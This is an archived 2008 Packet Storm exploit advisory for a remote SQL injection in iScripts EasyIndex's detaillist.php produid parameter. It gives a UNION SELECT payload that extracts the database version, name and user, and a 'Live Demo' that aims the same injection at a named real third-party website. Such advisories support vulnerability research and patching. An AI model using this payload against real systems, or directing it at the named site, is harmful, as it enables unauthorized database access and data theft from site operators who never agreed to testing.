iscriptseasy-sql.txt

2008-09-16T00:00:00
ID PACKETSTORM:70015
Type packetstorm
Reporter SirGod
Modified 2008-09-16T00:00:00

Description

                                        
                                            `#########################################################################################################################  
[+] iScripts EasyIndex (produid) Remote SQL Injection  
[+] Discovered By SirGod  
[+] wWw.MorTal-TeaM.OrG  
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke  
########################################################################################################################  
[+] Remote SQL Injection  
  
  
PoC :  
  
http://[target]/[path]/detaillist.php?produid=[SQL]  
  
  
Example :  
  
http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all  
select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--  
  
  
Live Demo :  
  
http://www.dawsonvalley.net/business/detaillist.php?produid=-1  
union all select  
1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--  
  
  
- Note : the number of colums can vary.  
  
  
##########################################################################################################################  
  
`